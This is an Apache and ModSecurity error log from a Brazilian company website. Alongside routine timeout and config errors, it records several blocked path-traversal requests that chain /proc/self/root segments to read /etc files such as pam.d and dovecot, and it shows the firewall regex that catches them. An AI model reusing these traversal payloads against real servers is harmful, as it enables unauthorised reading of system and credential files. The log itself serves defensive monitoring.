[Thu Mar 19 06:37:58.280879 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.243.128:57484] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvD9ta6ubjKNq_cu4YlTQAAA0E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 06:38:02.810573 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.244.43:45566] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvD-ta6ubjKNq_cu4YlVgAAA0I"]
[Thu Mar 19 06:38:14.122655 2026] [proxy_fcgi:error] [pid 30077:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:42202] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:38:26.327854 2026] [core:alert] [pid 31803:tid 140411607643904] [client 57.141.18.36:45446] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 06:38:39.134570 2026] [proxy_fcgi:error] [pid 31803:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:42902] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:39:06.265781 2026] [proxy_fcgi:error] [pid 15826:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:43588] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:39:18.233274 2026] [:error] [pid 27293:tid 140411548894976] [client 74.7.243.128:34746] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvERv-YZRR_7pZ7nDJsLwAAA9c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:39:28.132740 2026] [proxy_fcgi:error] [pid 27293:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:44088] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:39:56.122434 2026] [proxy_fcgi:error] [pid 17887:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:44784] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:40:21.125917 2026] [proxy_fcgi:error] [pid 26799:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:45346] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:40:46.129811 2026] [proxy_fcgi:error] [pid 30077:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:46042] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:40:48.594552 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.243.128:59366] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvEoNa6ubjKNq_cu4YmDAAAA0Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 06:40:56.026901 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.243.128:41470] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvEp-oXxyEfFpUF8f_uqgAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:40:58.351271 2026] [mime_magic:error] [pid 26799:tid 140411716749056] (70014)End of file found: [client 57.141.18.9:49316] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 06:41:08.129847 2026] [proxy_fcgi:error] [pid 31803:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:46520] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:41:10.541357 2026] [:error] [pid 31803:tid 140411565680384] [client 74.7.228.61:44934] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvEtuyqAr6etmhZHNpCdQAAAFU"]
[Thu Mar 19 06:41:29.602844 2026] [mime_magic:error] [pid 27293:tid 140411649607424] (70014)End of file found: [client 57.141.18.15:50132] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 06:41:34.294669 2026] [proxy_fcgi:error] [pid 17887:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:47164] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:41:34.874057 2026] [core:alert] [pid 14269:tid 140411590858496] [client 57.141.18.84:49086] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 06:42:01.125773 2026] [proxy_fcgi:error] [pid 27403:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:47924] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:42:16.860984 2026] [mime_magic:error] [pid 30077:tid 140411616036608] (70014)End of file found: [client 57.141.18.75:50796] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 06:42:27.106043 2026] [proxy_fcgi:error] [pid 26799:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:48630] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:42:52.137787 2026] [proxy_fcgi:error] [pid 19093:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:49290] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:42:59.413044 2026] [:error] [pid 31803:tid 140411599251200] [client 74.7.243.128:35300] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvFI-yqAr6etmhZHNpCrwAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 06:43:07.075781 2026] [:error] [pid 30077:tid 140411641214720] [client 74.7.244.43:43196] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvFK_u8EFLIOrSqIpuAJAAAAkw"]
[Thu Mar 19 06:43:17.125809 2026] [proxy_fcgi:error] [pid 27403:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:50012] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:43:31.054354 2026] [mime_magic:error] [pid 19093:tid 140411683178240] (70014)End of file found: [client 74.7.243.128:41040] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/sys/fs
[Thu Mar 19 06:43:44.779345 2026] [:error] [pid 27403:tid 140411632822016] [client 74.7.243.128:48962] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvFUBkFeYa1D6dYQnDO4QAAAc0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 06:43:45.849805 2026] [proxy_fcgi:error] [pid 19093:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:50856] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:43:50.178286 2026] [:error] [pid 14269:tid 140411683178240] [client 74.7.243.128:55972] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvFVgbLMZ6AikZjR9U8PwAAAAc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 06:44:08.093883 2026] [proxy_fcgi:error] [pid 15826:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:51558] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:44:19.505913 2026] [core:alert] [pid 17653:tid 140411540502272] [client 74.7.243.128:55974] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/usr
[Thu Mar 19 06:44:30.149709 2026] [proxy_fcgi:error] [pid 26799:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:52194] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:44:55.130369 2026] [proxy_fcgi:error] [pid 26799:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:52836] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:45:21.133777 2026] [proxy_fcgi:error] [pid 26799:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:53396] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:45:40.721888 2026] [mime_magic:error] [pid 14269:tid 140411590858496] (70014)End of file found: [client 57.141.18.54:56972] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 06:45:47.133784 2026] [proxy_fcgi:error] [pid 17653:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:53978] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:45:59.137868 2026] [mime_magic:error] [pid 27403:tid 140411616036608] (70014)End of file found: [client 57.141.18.12:56536] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 06:46:01.776076 2026] [mime_magic:error] [pid 14269:tid 140411674785536] (70014)End of file found: [client 57.141.18.51:57302] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 06:46:08.261083 2026] [mime_magic:error] [pid 17887:tid 140411540502272] (70014)End of file found: [client 57.141.18.19:57626] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 06:46:11.615393 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.228.61:49178] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvF48df6f5d65gmYZRT3AAAAs0"]
[Thu Mar 19 06:46:12.129959 2026] [proxy_fcgi:error] [pid 15826:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:54590] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:46:35.058390 2026] [proxy_fcgi:error] [pid 17887:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:55112] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:46:49.151886 2026] [mime_magic:error] [pid 17653:tid 140411699963648] (70014)End of file found: [client 57.141.18.110:58722] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 06:47:02.793799 2026] [proxy_fcgi:error] [pid 30077:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:55778] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:47:06.471696 2026] [core:alert] [pid 26799:tid 140411666392832] [client 57.141.18.36:59144] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 06:47:22.406953 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.243.128:35604] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvGKta6ubjKNq_cu4YniAAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:47:24.872353 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.243.128:34940] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvGLMdf6f5d65gmYZRUAwAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 06:47:28.125881 2026] [proxy_fcgi:error] [pid 15826:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:56484] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:47:35.525111 2026] [core:alert] [pid 31803:tid 140411582465792] [client 74.7.243.128:34948] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/usr/local
[Thu Mar 19 06:47:51.142013 2026] [proxy_fcgi:error] [pid 30077:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:57114] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:48:14.399131 2026] [:error] [pid 17653:tid 140411548894976] [client 74.7.244.43:50944] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvGXsdf6f5d65gmYZRUIgAAAtc"]
[Thu Mar 19 06:48:17.129914 2026] [proxy_fcgi:error] [pid 31803:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:57844] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:48:33.290880 2026] [mime_magic:error] [pid 27403:tid 140411708356352] (70014)End of file found: [client 57.141.18.122:33086] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 06:48:43.130195 2026] [proxy_fcgi:error] [pid 31803:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:58546] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:49:08.161795 2026] [proxy_fcgi:error] [pid 27293:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:59252] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:49:31.126006 2026] [proxy_fcgi:error] [pid 19093:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:59846] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:49:56.041873 2026] [proxy_fcgi:error] [pid 15826:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:60606] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:50:21.157814 2026] [proxy_fcgi:error] [pid 15826:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:33032] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:50:48.138424 2026] [proxy_fcgi:error] [pid 17887:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:33798] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:50:55.588150 2026] [:error] [pid 19093:tid 140411582465792] [client 74.7.243.128:48262] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvG_1_V7PWP6ixUYl6cWgAAApM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 06:51:00.223835 2026] [:error] [pid 17887:tid 140411716749056] [client 74.7.243.128:41788] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvHBAkwaGbbGflqUZCaZwAAAMM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 06:51:04.053116 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.243.128:41792] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvHCOyqAr6etmhZHNpDtAAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
